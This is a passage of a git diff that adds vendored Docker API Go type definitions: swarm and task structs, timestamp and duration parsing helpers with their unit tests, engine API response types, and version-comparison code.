until + // recreated. + LogDriver *Driver `json:",omitempty"` +} + +// EncryptionConfig controls at-rest encryption of data and keys. +type EncryptionConfig struct { + // AutoLockManagers specifies whether or not managers TLS keys and raft data + // should be encrypted at rest in such a way that they must be unlocked + // before the manager node starts up again. + AutoLockManagers bool +} + +// RaftConfig represents raft configuration. +type RaftConfig struct { + // SnapshotInterval is the number of log entries between snapshots. + SnapshotInterval uint64 `json:",omitempty"` + + // KeepOldSnapshots is the number of snapshots to keep beyond the + // current snapshot. + KeepOldSnapshots *uint64 `json:",omitempty"` + + // LogEntriesForSlowFollowers is the number of log entries to keep + // around to sync up slow followers after a snapshot is created. + LogEntriesForSlowFollowers uint64 `json:",omitempty"` + + // ElectionTick is the number of ticks that a follower will wait for a message + // from the leader before becoming a candidate and starting an election. + // ElectionTick must be greater than HeartbeatTick. + // + // A tick currently defaults to one second, so these translate directly to + // seconds currently, but this is NOT guaranteed. + ElectionTick int + + // HeartbeatTick is the number of ticks between heartbeats. Every + // HeartbeatTick ticks, the leader will send a heartbeat to the + // followers. + // + // A tick currently defaults to one second, so these translate directly to + // seconds currently, but this is NOT guaranteed. + HeartbeatTick int +} + +// DispatcherConfig represents dispatcher configuration. +type DispatcherConfig struct { + // HeartbeatPeriod defines how often agent should send heartbeats to + // dispatcher. + HeartbeatPeriod time.Duration `json:",omitempty"` +} + +// CAConfig represents CA configuration. +type CAConfig struct { + // NodeCertExpiry is the duration certificates should be issued for + NodeCertExpiry time.Duration `json:",omitempty"` + + // ExternalCAs is a list of CAs to which a manager node will make + // certificate signing requests for node certificates. + ExternalCAs []*ExternalCA `json:",omitempty"` +} + +// ExternalCAProtocol represents type of external CA. +type ExternalCAProtocol string + +// ExternalCAProtocolCFSSL CFSSL +const ExternalCAProtocolCFSSL ExternalCAProtocol = "cfssl" + +// ExternalCA defines external CA to be used by the cluster. +type ExternalCA struct { + // Protocol is the protocol used by this external CA. + Protocol ExternalCAProtocol + + // URL is the URL where the external CA can be reached. + URL string + + // Options is a set of additional key/value pairs whose interpretation + // depends on the specified CA type. + Options map[string]string `json:",omitempty"` +} + +// InitRequest is the request used to init a swarm. +type InitRequest struct { + ListenAddr string + AdvertiseAddr string + ForceNewCluster bool + Spec Spec + AutoLockManagers bool +} + +// JoinRequest is the request used to join a swarm. +type JoinRequest struct { + ListenAddr string + AdvertiseAddr string + RemoteAddrs []string + JoinToken string // accept by secret +} + +// UnlockRequest is the request used to unlock a swarm. +type UnlockRequest struct { + // UnlockKey is the unlock key in ASCII-armored format. + UnlockKey string +} + +// LocalNodeState represents the state of the local node. +type LocalNodeState string + +const ( + // LocalNodeStateInactive INACTIVE + LocalNodeStateInactive LocalNodeState = "inactive" + // LocalNodeStatePending PENDING + LocalNodeStatePending LocalNodeState = "pending" + // LocalNodeStateActive ACTIVE + LocalNodeStateActive LocalNodeState = "active" + // LocalNodeStateError ERROR + LocalNodeStateError LocalNodeState = "error" + // LocalNodeStateLocked LOCKED + LocalNodeStateLocked LocalNodeState = "locked" +) + +// Info represents generic information about swarm. +type Info struct { + NodeID string + NodeAddr string + + LocalNodeState LocalNodeState + ControlAvailable bool + Error string + + RemoteManagers []Peer + Nodes int + Managers int + + Cluster ClusterInfo +} + +// Peer represents a peer. +type Peer struct { + NodeID string + Addr string +} + +// UpdateFlags contains flags for SwarmUpdate. +type UpdateFlags struct { + RotateWorkerToken bool + RotateManagerToken bool + RotateManagerUnlockKey bool +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/task.go b/vendor/github.com/docker/docker/api/types/swarm/task.go new file mode 100644 index 0000000000..ace12cc89f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/task.go @@ -0,0 +1,128 @@ +package swarm + +import "time" + +// TaskState represents the state of a task. +type TaskState string + +const ( + // TaskStateNew NEW + TaskStateNew TaskState = "new" + // TaskStateAllocated ALLOCATED + TaskStateAllocated TaskState = "allocated" + // TaskStatePending PENDING + TaskStatePending TaskState = "pending" + // TaskStateAssigned ASSIGNED + TaskStateAssigned TaskState = "assigned" + // TaskStateAccepted ACCEPTED + TaskStateAccepted TaskState = "accepted" + // TaskStatePreparing PREPARING + TaskStatePreparing TaskState = "preparing" + // TaskStateReady READY + TaskStateReady TaskState = "ready" + // TaskStateStarting STARTING + TaskStateStarting TaskState = "starting" + // TaskStateRunning RUNNING + TaskStateRunning TaskState = "running" + // TaskStateComplete COMPLETE + TaskStateComplete TaskState = "complete" + // TaskStateShutdown SHUTDOWN + TaskStateShutdown TaskState = "shutdown" + // TaskStateFailed FAILED + TaskStateFailed TaskState = "failed" + // TaskStateRejected REJECTED + TaskStateRejected TaskState = "rejected" +) + +// Task represents a task. +type Task struct { + ID string + Meta + Annotations + + Spec TaskSpec `json:",omitempty"` + ServiceID string `json:",omitempty"` + Slot int `json:",omitempty"` + NodeID string `json:",omitempty"` + Status TaskStatus `json:",omitempty"` + DesiredState TaskState `json:",omitempty"` + NetworksAttachments []NetworkAttachment `json:",omitempty"` +} + +// TaskSpec represents the spec of a task. +type TaskSpec struct { + ContainerSpec ContainerSpec `json:",omitempty"` + Resources *ResourceRequirements `json:",omitempty"` + RestartPolicy *RestartPolicy `json:",omitempty"` + Placement *Placement `json:",omitempty"` + Networks []NetworkAttachmentConfig `json:",omitempty"` + + // LogDriver specifies the LogDriver to use for tasks created from this + // spec. If not present, the one on cluster default on swarm.Spec will be + // used, finally falling back to the engine default if not specified. + LogDriver *Driver `json:",omitempty"` + + // ForceUpdate is a counter that triggers an update even if no relevant + // parameters have been changed. + ForceUpdate uint64 +} + +// Resources represents resources (CPU/Memory). +type Resources struct { + NanoCPUs int64 `json:",omitempty"` + MemoryBytes int64 `json:",omitempty"` +} + +// ResourceRequirements represents resources requirements. +type ResourceRequirements struct { + Limits *Resources `json:",omitempty"` + Reservations *Resources `json:",omitempty"` +} + +// Placement represents orchestration parameters. +type Placement struct { + Constraints []string `json:",omitempty"` +} + +// RestartPolicy represents the restart policy. +type RestartPolicy struct { + Condition RestartPolicyCondition `json:",omitempty"` + Delay *time.Duration `json:",omitempty"` + MaxAttempts *uint64 `json:",omitempty"` + Window *time.Duration `json:",omitempty"` +} + +// RestartPolicyCondition represents when to restart. +type RestartPolicyCondition string + +const ( + // RestartPolicyConditionNone NONE + RestartPolicyConditionNone RestartPolicyCondition = "none" + // RestartPolicyConditionOnFailure ON_FAILURE + RestartPolicyConditionOnFailure RestartPolicyCondition = "on-failure" + // RestartPolicyConditionAny ANY + RestartPolicyConditionAny RestartPolicyCondition = "any" +) + +// TaskStatus represents the status of a task. +type TaskStatus struct { + Timestamp time.Time `json:",omitempty"` + State TaskState `json:",omitempty"` + Message string `json:",omitempty"` + Err string `json:",omitempty"` + ContainerStatus ContainerStatus `json:",omitempty"` + PortStatus PortStatus `json:",omitempty"` +} + +// ContainerStatus represents the status of a container. +type ContainerStatus struct { + ContainerID string `json:",omitempty"` + PID int `json:",omitempty"` + ExitCode int `json:",omitempty"` +} + +// PortStatus represents the port status of a task's host ports whose +// service has published host ports +type PortStatus struct { + Ports []PortConfig `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert.go b/vendor/github.com/docker/docker/api/types/time/duration_convert.go new file mode 100644 index 0000000000..63e1eec19e --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/duration_convert.go @@ -0,0 +1,12 @@ +package time + +import ( + "strconv" + "time" +) + +// DurationToSecondsString converts the specified duration to the number +// seconds it represents, formatted as a string. +func DurationToSecondsString(duration time.Duration) string { + return strconv.FormatFloat(duration.Seconds(), 'f', 0, 64) +} diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go new file mode 100644 index 0000000000..869c08f863 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go @@ -0,0 +1,26 @@ +package time + +import ( + "testing" + "time" +) + +func TestDurationToSecondsString(t *testing.T) { + cases := []struct { + in time.Duration + expected string + }{ + {0 * time.Second, "0"}, + {1 * time.Second, "1"}, + {1 * time.Minute, "60"}, + {24 * time.Hour, "86400"}, + } + + for _, c := range cases { + s := DurationToSecondsString(c.in) + if s != c.expected { + t.Errorf("wrong value for input `%v`: expected `%s`, got `%s`", c.in, c.expected, s) + t.Fail() + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp.go b/vendor/github.com/docker/docker/api/types/time/timestamp.go new file mode 100644 index 0000000000..d3695ba723 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/timestamp.go @@ -0,0 +1,124 @@ +package time + +import ( + "fmt" + "math" + "strconv" + "strings" + "time" +) + +// These are additional predefined layouts for use in Time.Format and Time.Parse +// with --since and --until parameters for `docker logs` and `docker events` +const ( + rFC3339Local = "2006-01-02T15:04:05" // RFC3339 with local timezone + rFC3339NanoLocal = "2006-01-02T15:04:05.999999999" // RFC3339Nano with local timezone + dateWithZone = "2006-01-02Z07:00" // RFC3339 with time at 00:00:00 + dateLocal = "2006-01-02" // RFC3339 with local timezone and time at 00:00:00 +) + +// GetTimestamp tries to parse given string as golang duration, +// then RFC3339 time and finally as a Unix timestamp. If +// any of these were successful, it returns a Unix timestamp +// as string otherwise returns the given value back. +// In case of duration input, the returned timestamp is computed +// as the given reference time minus the amount of the duration. +func GetTimestamp(value string, reference time.Time) (string, error) { + if d, err := time.ParseDuration(value); value != "0" && err == nil { + return strconv.FormatInt(reference.Add(-d).Unix(), 10), nil + } + + var format string + var parseInLocation bool + + // if the string has a Z or a + or three dashes use parse otherwise use parseinlocation + parseInLocation = !(strings.ContainsAny(value, "zZ+") || strings.Count(value, "-") == 3) + + if strings.Contains(value, ".") { + if parseInLocation { + format = rFC3339NanoLocal + } else { + format = time.RFC3339Nano + } + } else if strings.Contains(value, "T") { + // we want the number of colons in the T portion of the timestamp + tcolons := strings.Count(value, ":") + // if parseInLocation is off and we have a +/- zone offset (not Z) then + // there will be an extra colon in the input for the tz offset subtract that + // colon from the tcolons count + if !parseInLocation && !strings.ContainsAny(value, "zZ") && tcolons > 0 { + tcolons-- + } + if parseInLocation { + switch tcolons { + case 0: + format = "2006-01-02T15" + case 1: + format = "2006-01-02T15:04" + default: + format = rFC3339Local + } + } else { + switch tcolons { + case 0: + format = "2006-01-02T15Z07:00" + case 1: + format = "2006-01-02T15:04Z07:00" + default: + format = time.RFC3339 + } + } + } else if parseInLocation { + format = dateLocal + } else { + format = dateWithZone + } + + var t time.Time + var err error + + if parseInLocation { + t, err = time.ParseInLocation(format, value, time.FixedZone(reference.Zone())) + } else { + t, err = time.Parse(format, value) + } + + if err != nil { + // if there is a `-` then its an RFC3339 like timestamp otherwise assume unixtimestamp + if strings.Contains(value, "-") { + return "", err // was probably an RFC3339 like timestamp but the parser failed with an error + } + return value, nil // unixtimestamp in and out case (meaning: the value passed at the command line is already in the right format for passing to the server) + } + + return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())), nil +} + +// ParseTimestamps returns seconds and nanoseconds from a timestamp that has the +// format "%d.%09d", time.Unix(), int64(time.Nanosecond())) +// if the incoming nanosecond portion is longer or shorter than 9 digits it is +// converted to nanoseconds. The expectation is that the seconds and +// seconds will be used to create a time variable. For example: +// seconds, nanoseconds, err := ParseTimestamp("1136073600.000000001",0) +// if err == nil since := time.Unix(seconds, nanoseconds) +// returns seconds as def(aultSeconds) if value == "" +func ParseTimestamps(value string, def int64) (int64, int64, error) { + if value == "" { + return def, 0, nil + } + sa := strings.SplitN(value, ".", 2) + s, err := strconv.ParseInt(sa[0], 10, 64) + if err != nil { + return s, 0, err + } + if len(sa) != 2 { + return s, 0, nil + } + n, err := strconv.ParseInt(sa[1], 10, 64) + if err != nil { + return s, n, err + } + // should already be in nanoseconds but just in case convert n to nanoseonds + n = int64(float64(n) * math.Pow(float64(10), float64(9-len(sa[1])))) + return s, n, nil +} diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp_test.go b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go new file mode 100644 index 0000000000..a1651309d7 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go @@ -0,0 +1,93 @@ +package time + +import ( + "fmt" + "testing" + "time" +) + +func TestGetTimestamp(t *testing.T) { + now := time.Now().In(time.UTC) + cases := []struct { + in, expected string + expectedErr bool + }{ + // Partial RFC3339 strings get parsed with second precision + {"2006-01-02T15:04:05.999999999+07:00", "1136189045.999999999", false}, + {"2006-01-02T15:04:05.999999999Z", "1136214245.999999999", false}, + {"2006-01-02T15:04:05.999999999", "1136214245.999999999", false}, + {"2006-01-02T15:04:05Z", "1136214245.000000000", false}, + {"2006-01-02T15:04:05", "1136214245.000000000", false}, + {"2006-01-02T15:04:0Z", "", true}, + {"2006-01-02T15:04:0", "", true}, + {"2006-01-02T15:04Z", "1136214240.000000000", false}, + {"2006-01-02T15:04+00:00", "1136214240.000000000", false}, + {"2006-01-02T15:04-00:00", "1136214240.000000000", false}, + {"2006-01-02T15:04", "1136214240.000000000", false}, + {"2006-01-02T15:0Z", "", true}, + {"2006-01-02T15:0", "", true}, + {"2006-01-02T15Z", "1136214000.000000000", false}, + {"2006-01-02T15+00:00", "1136214000.000000000", false}, + {"2006-01-02T15-00:00", "1136214000.000000000", false}, + {"2006-01-02T15", "1136214000.000000000", false}, + {"2006-01-02T1Z", "1136163600.000000000", false}, + {"2006-01-02T1", "1136163600.000000000", false}, + {"2006-01-02TZ", "", true}, + {"2006-01-02T", "", true}, + {"2006-01-02+00:00", "1136160000.000000000", false}, + {"2006-01-02-00:00", "1136160000.000000000", false}, + {"2006-01-02-00:01", "1136160060.000000000", false}, + {"2006-01-02Z", "1136160000.000000000", false}, + {"2006-01-02", "1136160000.000000000", false}, + {"2015-05-13T20:39:09Z", "1431549549.000000000", false}, + + // unix timestamps returned as is + {"1136073600", "1136073600", false}, + {"1136073600.000000001", "1136073600.000000001", false}, + // Durations + {"1m", fmt.Sprintf("%d", now.Add(-1*time.Minute).Unix()), false}, + {"1.5h", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false}, + {"1h30m", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false}, + + // String fallback + {"invalid", "invalid", false}, + } + + for _, c := range cases { + o, err := GetTimestamp(c.in, now) + if o != c.expected || + (err == nil && c.expectedErr) || + (err != nil && !c.expectedErr) { + t.Errorf("wrong value for '%s'. expected:'%s' got:'%s' with error: `%s`", c.in, c.expected, o, err) + t.Fail() + } + } +} + +func TestParseTimestamps(t *testing.T) { + cases := []struct { + in string + def, expectedS, expectedN int64 + expectedErr bool + }{ + // unix timestamps + {"1136073600", 0, 1136073600, 0, false}, + {"1136073600.000000001", 0, 1136073600, 1, false}, + {"1136073600.0000000010", 0, 1136073600, 1, false}, + {"1136073600.00000001", 0, 1136073600, 10, false}, + {"foo.bar", 0, 0, 0, true}, + {"1136073600.bar", 0, 1136073600, 0, true}, + {"", -1, -1, 0, false}, + } + + for _, c := range cases { + s, n, err := ParseTimestamps(c.in, c.def) + if s != c.expectedS || + n != c.expectedN || + (err == nil && c.expectedErr) || + (err != nil && !c.expectedErr) { + t.Errorf("wrong values for input `%s` with default `%d` expected:'%d'seconds and `%d`nanosecond got:'%d'seconds and `%d`nanoseconds with error: `%s`", c.in, c.def, c.expectedS, c.expectedN, s, n, err) + t.Fail() + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/types.go b/vendor/github.com/docker/docker/api/types/types.go new file mode 100644 index 0000000000..a82c3e88ef --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/types.go @@ -0,0 +1,549 @@ +package types + +import ( + "errors" + "fmt" + "io" + "os" + "strings" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/go-connections/nat" +) + +// ContainerChange contains response of Engine API: +// GET "/containers/{name:.*}/changes" +type ContainerChange struct { + Kind int + Path string +} + +// ImageHistory contains response of Engine API: +// GET "/images/{name:.*}/history" +type ImageHistory struct { + ID string `json:"Id"` + Created int64 + CreatedBy string + Tags []string + Size int64 + Comment string +} + +// ImageDelete contains response of Engine API: +// DELETE "/images/{name:.*}" +type ImageDelete struct { + Untagged string `json:",omitempty"` + Deleted string `json:",omitempty"` +} + +// GraphDriverData returns Image's graph driver config info +// when calling inspect command +type GraphDriverData struct { + Name string + Data map[string]string +} + +// RootFS returns Image's RootFS description including the layer IDs. +type RootFS struct { + Type string + Layers []string `json:",omitempty"` + BaseLayer string `json:",omitempty"` +} + +// ImageInspect contains response of Engine API: +// GET "/images/{name:.*}/json" +type ImageInspect struct { + ID string `json:"Id"` + RepoTags []string + RepoDigests []string + Parent string + Comment string + Created string + Container string + ContainerConfig *container.Config + DockerVersion string + Author string + Config *container.Config + Architecture string + Os string + OsVersion string `json:",omitempty"` + Size int64 + VirtualSize int64 + GraphDriver GraphDriverData + RootFS RootFS +} + +// Container contains response of Engine API: +// GET "/containers/json" +type Container struct { + ID string `json:"Id"` + Names []string + Image string + ImageID string + Command string + Created int64 + Ports []Port + SizeRw int64 `json:",omitempty"` + SizeRootFs int64 `json:",omitempty"` + Labels map[string]string + State string + Status string + HostConfig struct { + NetworkMode string `json:",omitempty"` + } + NetworkSettings *SummaryNetworkSettings + Mounts []MountPoint +} + +// CopyConfig contains request body of Engine API: +// POST "/containers/"+containerID+"/copy" +type CopyConfig struct { + Resource string +} + +// ContainerPathStat is used to encode the header from +// GET "/containers/{name:.*}/archive" +// "Name" is the file or directory name. +type ContainerPathStat struct { + Name string `json:"name"` + Size int64 `json:"size"` + Mode os.FileMode `json:"mode"` + Mtime time.Time `json:"mtime"` + LinkTarget string `json:"linkTarget"` +} + +// ContainerStats contains response of Engine API: +// GET "/stats" +type ContainerStats struct { + Body io.ReadCloser `json:"body"` + OSType string `json:"ostype"` +} + +// ContainerProcessList contains response of Engine API: +// GET "/containers/{name:.*}/top" +type ContainerProcessList struct { + Processes [][]string + Titles []string +} + +// Ping contains response of Engine API: +// GET "/_ping" +type Ping struct { + APIVersion string + Experimental bool +} + +// Version contains response of Engine API: +// GET "/version" +type Version struct { + Version string + APIVersion string `json:"ApiVersion"` + MinAPIVersion string `json:"MinAPIVersion,omitempty"` + GitCommit string + GoVersion string + Os string + Arch string + KernelVersion string `json:",omitempty"` + Experimental bool `json:",omitempty"` + BuildTime string `json:",omitempty"` +} + +// Commit records a external tool actual commit id version along the +// one expect by dockerd as set at build time +type Commit struct { + ID string + Expected string +} + +// Info contains response of Engine API: +// GET "/info" +type Info struct { + ID string + Containers int + ContainersRunning int + ContainersPaused int + ContainersStopped int + Images int + Driver string + DriverStatus [][2]string + SystemStatus [][2]string + Plugins PluginsInfo + MemoryLimit bool + SwapLimit bool + KernelMemory bool + CPUCfsPeriod bool `json:"CpuCfsPeriod"` + CPUCfsQuota bool `json:"CpuCfsQuota"` + CPUShares bool + CPUSet bool + IPv4Forwarding bool + BridgeNfIptables bool + BridgeNfIP6tables bool `json:"BridgeNfIp6tables"` + Debug bool + NFd int + OomKillDisable bool + NGoroutines int + SystemTime string + LoggingDriver string + CgroupDriver string + NEventsListener int + KernelVersion string + OperatingSystem string + OSType string + Architecture string + IndexServerAddress string + RegistryConfig *registry.ServiceConfig + NCPU int + MemTotal int64 + DockerRootDir string + HTTPProxy string `json:"HttpProxy"` + HTTPSProxy string `json:"HttpsProxy"` + NoProxy string + Name string + Labels []string + ExperimentalBuild bool + ServerVersion string + ClusterStore string + ClusterAdvertise string + Runtimes map[string]Runtime + DefaultRuntime string + Swarm swarm.Info + // LiveRestoreEnabled determines whether containers should be kept + // running when the daemon is shutdown or upon daemon start if + // running containers are detected + LiveRestoreEnabled bool + Isolation container.Isolation + InitBinary string + ContainerdCommit Commit + RuncCommit Commit + InitCommit Commit + SecurityOptions []string +} + +// KeyValue holds a key/value pair +type KeyValue struct { + Key, Value string +} + +// SecurityOpt contains the name and options of a security option +type SecurityOpt struct { + Name string + Options []KeyValue +} + +// DecodeSecurityOptions decodes a security options string slice to a type safe +// SecurityOpt +func DecodeSecurityOptions(opts []string) ([]SecurityOpt, error) { + so := []SecurityOpt{} + for _, opt := range opts { + // support output from a < 1.13 docker daemon + if !strings.Contains(opt, "=") { + so = append(so, SecurityOpt{Name: opt}) + continue + } + secopt := SecurityOpt{} + split := strings.Split(opt, ",") + for _, s := range split { + kv := strings.SplitN(s, "=", 2) + if len(kv) != 2 { + return nil, fmt.Errorf("invalid security option %q", s) + } + if kv[0] == "" || kv[1] == "" { + return nil, errors.New("invalid empty security option") + } + if kv[0] == "name" { + secopt.Name = kv[1] + continue + } + secopt.Options = append(secopt.Options, KeyValue{Key: kv[0], Value: kv[1]}) + } + so = append(so, secopt) + } + return so, nil +} + +// PluginsInfo is a temp struct holding Plugins name +// registered with docker daemon. It is used by Info struct +type PluginsInfo struct { + // List of Volume plugins registered + Volume []string + // List of Network plugins registered + Network []string + // List of Authorization plugins registered + Authorization []string +} + +// ExecStartCheck is a temp struct used by execStart +// Config fields is part of ExecConfig in runconfig package +type ExecStartCheck struct { + // ExecStart will first check if it's detached + Detach bool + // Check if there's a tty + Tty bool +} + +// HealthcheckResult stores information about a single run of a healthcheck probe +type HealthcheckResult struct { + Start time.Time // Start is the time this check started + End time.Time // End is the time this check ended + ExitCode int // ExitCode meanings: 0=healthy, 1=unhealthy, 2=reserved (considered unhealthy), else=error running probe + Output string // Output from last check +} + +// Health states +const ( + NoHealthcheck = "none" // Indicates there is no healthcheck + Starting = "starting" // Starting indicates that the container is not yet ready + Healthy = "healthy" // Healthy indicates that the container is running correctly + Unhealthy = "unhealthy" // Unhealthy indicates that the container has a problem +) + +// Health stores information about the container's healthcheck results +type Health struct { + Status string // Status is one of Starting, Healthy or Unhealthy + FailingStreak int // FailingStreak is the number of consecutive failures + Log []*HealthcheckResult // Log contains the last few results (oldest first) +} + +// ContainerState stores container's running state +// it's part of ContainerJSONBase and will return by "inspect" command +type ContainerState struct { + Status string + Running bool + Paused bool + Restarting bool + OOMKilled bool + Dead bool + Pid int + ExitCode int + Error string + StartedAt string + FinishedAt string + Health *Health `json:",omitempty"` +} + +// ContainerNode stores information about the node that a container +// is running on. It's only available in Docker Swarm +type ContainerNode struct { + ID string + IPAddress string `json:"IP"` + Addr string + Name string + Cpus int + Memory int64 + Labels map[string]string +} + +// ContainerJSONBase contains response of Engine API: +// GET "/containers/{name:.*}/json" +type ContainerJSONBase struct { + ID string `json:"Id"` + Created string + Path string + Args []string + State *ContainerState + Image string + ResolvConfPath string + HostnamePath string + HostsPath string + LogPath string + Node *ContainerNode `json:",omitempty"` + Name string + RestartCount int + Driver string + MountLabel string + ProcessLabel string + AppArmorProfile string + ExecIDs []string + HostConfig *container.HostConfig + GraphDriver GraphDriverData + SizeRw *int64 `json:",omitempty"` + SizeRootFs *int64 `json:",omitempty"` +} + +// ContainerJSON is newly used struct along with MountPoint +type ContainerJSON struct { + *ContainerJSONBase + Mounts []MountPoint + Config *container.Config + NetworkSettings *NetworkSettings +} + +// NetworkSettings exposes the network settings in the api +type NetworkSettings struct { + NetworkSettingsBase + DefaultNetworkSettings + Networks map[string]*network.EndpointSettings +} + +// SummaryNetworkSettings provides a summary of container's networks +// in /containers/json +type SummaryNetworkSettings struct { + Networks map[string]*network.EndpointSettings +} + +// NetworkSettingsBase holds basic information about networks +type NetworkSettingsBase struct { + Bridge string // Bridge is the Bridge name the network uses(e.g. `docker0`) + SandboxID string // SandboxID uniquely represents a container's network stack + HairpinMode bool // HairpinMode specifies if hairpin NAT should be enabled on the virtual interface + LinkLocalIPv6Address string // LinkLocalIPv6Address is an IPv6 unicast address using the link-local prefix + LinkLocalIPv6PrefixLen int // LinkLocalIPv6PrefixLen is the prefix length of an IPv6 unicast address + Ports nat.PortMap // Ports is a collection of PortBinding indexed by Port + SandboxKey string // SandboxKey identifies the sandbox + SecondaryIPAddresses []network.Address + SecondaryIPv6Addresses []network.Address +} + +// DefaultNetworkSettings holds network information +// during the 2 release deprecation period. +// It will be removed in Docker 1.11. +type DefaultNetworkSettings struct { + EndpointID string // EndpointID uniquely represents a service endpoint in a Sandbox + Gateway string // Gateway holds the gateway address for the network + GlobalIPv6Address string // GlobalIPv6Address holds network's global IPv6 address + GlobalIPv6PrefixLen int // GlobalIPv6PrefixLen represents mask length of network's global IPv6 address + IPAddress string // IPAddress holds the IPv4 address for the network + IPPrefixLen int // IPPrefixLen represents mask length of network's IPv4 address + IPv6Gateway string // IPv6Gateway holds gateway address specific for IPv6 + MacAddress string // MacAddress holds the MAC address for the network +} + +// MountPoint represents a mount point configuration inside the container. +// This is used for reporting the mountpoints in use by a container. +type MountPoint struct { + Type mount.Type `json:",omitempty"` + Name string `json:",omitempty"` + Source string + Destination string + Driver string `json:",omitempty"` + Mode string + RW bool + Propagation mount.Propagation +} + +// NetworkResource is the body of the "get network" http response message +type NetworkResource struct { + Name string // Name is the requested name of the network + ID string `json:"Id"` // ID uniquely identifies a network on a single machine + Created time.Time // Created is the time the network created + Scope string // Scope describes the level at which the network exists (e.g. `global` for cluster-wide or `local` for machine level) + Driver string // Driver is the Driver name used to create the network (e.g. `bridge`, `overlay`) + EnableIPv6 bool // EnableIPv6 represents whether to enable IPv6 + IPAM network.IPAM // IPAM is the network's IP Address Management + Internal bool // Internal represents if the network is used internal only + Attachable bool // Attachable represents if the global scope is manually attachable by regular containers from workers in swarm mode. + Containers map[string]EndpointResource // Containers contains endpoints belonging to the network + Options map[string]string // Options holds the network specific options to use for when creating the network + Labels map[string]string // Labels holds metadata specific to the network being created + Peers []network.PeerInfo `json:",omitempty"` // List of peer nodes for an overlay network +} + +// EndpointResource contains network resources allocated and used for a container in a network +type EndpointResource struct { + Name string + EndpointID string + MacAddress string + IPv4Address string + IPv6Address string +} + +// NetworkCreate is the expected body of the "create network" http request message +type NetworkCreate struct { + CheckDuplicate bool + Driver string + EnableIPv6 bool + IPAM *network.IPAM + Internal bool + Attachable bool + Options map[string]string + Labels map[string]string +} + +// NetworkCreateRequest is the request message sent to the server for network create call. +type NetworkCreateRequest struct { + NetworkCreate + Name string +} + +// NetworkCreateResponse is the response message sent by the server for network create call +type NetworkCreateResponse struct { + ID string `json:"Id"` + Warning string +} + +// NetworkConnect represents the data to be used to connect a container to the network +type NetworkConnect struct { + Container string + EndpointConfig *network.EndpointSettings `json:",omitempty"` +} + +// NetworkDisconnect represents the data to be used to disconnect a container from the network +type NetworkDisconnect struct { + Container string + Force bool +} + +// Checkpoint represents the details of a checkpoint +type Checkpoint struct { + Name string // Name is the name of the checkpoint +} + +// Runtime describes an OCI runtime +type Runtime struct { + Path string `json:"path"` + Args []string `json:"runtimeArgs,omitempty"` +} + +// DiskUsage contains response of Engine API: +// GET "/system/df" +type DiskUsage struct { + LayersSize int64 + Images []*ImageSummary + Containers []*Container + Volumes []*Volume +} + +// ContainersPruneReport contains the response for Engine API: +// POST "/containers/prune" +type ContainersPruneReport struct { + ContainersDeleted []string + SpaceReclaimed uint64 +} + +// VolumesPruneReport contains the response for Engine API: +// POST "/volumes/prune" +type VolumesPruneReport struct { + VolumesDeleted []string + SpaceReclaimed uint64 +} + +// ImagesPruneReport contains the response for Engine API: +// POST "/images/prune" +type ImagesPruneReport struct { + ImagesDeleted []ImageDelete + SpaceReclaimed uint64 +} + +// NetworksPruneReport contains the response for Engine API: +// POST "/networks/prune" +type NetworksPruneReport struct { + NetworksDeleted []string +} + +// SecretCreateResponse contains the information returned to a client +// on the creation of a new secret. +type SecretCreateResponse struct { + // ID is the id of the created secret. + ID string +} + +// SecretListOptions holds parameters to list secrets +type SecretListOptions struct { + Filters filters.Args +} diff --git a/vendor/github.com/docker/docker/api/types/versions/README.md b/vendor/github.com/docker/docker/api/types/versions/README.md new file mode 100644 index 0000000000..cdac50a53c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/README.md @@ -0,0 +1,14 @@ +## Legacy API type versions + +This package includes types for legacy API versions. The stable version of the API types live in `api/types/*.go`. + +Consider moving a type here when you need to keep backwards compatibility in the API. This legacy types are organized by the latest API version they appear in. For instance, types in the `v1p19` package are valid for API versions below or equal `1.19`. Types in the `v1p20` package are valid for the API version `1.20`, since the versions below that will use the legacy types in `v1p19`. + +### Package name conventions + +The package name convention is to use `v` as a prefix for the version number and `p`(patch) as a separator. We use this nomenclature due to a few restrictions in the Go package name convention: + +1. We cannot use `.` because it's interpreted by the language, think of `v1.20.CallFunction`. +2. We cannot use `_` because golint complains about it. The code is actually valid, but it looks probably more weird: `v1_20.CallFunction`. + +For instance, if you want to modify a type that was available in the version `1.21` of the API but it will have different fields in the version `1.22`, you want to create a new package under `api/types/versions/v1p21`. diff --git a/vendor/github.com/docker/docker/api/types/versions/compare.go b/vendor/github.com/docker/docker/api/types/versions/compare.go new file mode 100644 index 0000000000..611d4fed66 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/compare.go @@ -0,0 +1,62 @@ +package versions + +import ( + "strconv" + "strings" +) + +// compare compares two version strings +// returns -1 if v1 < v2, 1 if v1 > v2, 0 otherwise. +func compare(v1, v2 string) int { + var ( + currTab = strings.Split(v1, ".") + otherTab = strings.Split(v2, ".") + ) + + max := len(currTab) + if len(otherTab) > max { + max = len(otherTab) + } + for i := 0; i < max; i++ { + var currInt, otherInt int + + if len(currTab) > i { + currInt, _ = strconv.Atoi(currTab[i]) + } + if len(otherTab) > i { + otherInt, _ = strconv.Atoi(otherTab[i]) + } + if currInt > otherInt { + return 1 + } + if otherInt > currInt { + return -1 + } + } + return 0 +} + +// LessThan checks if a version 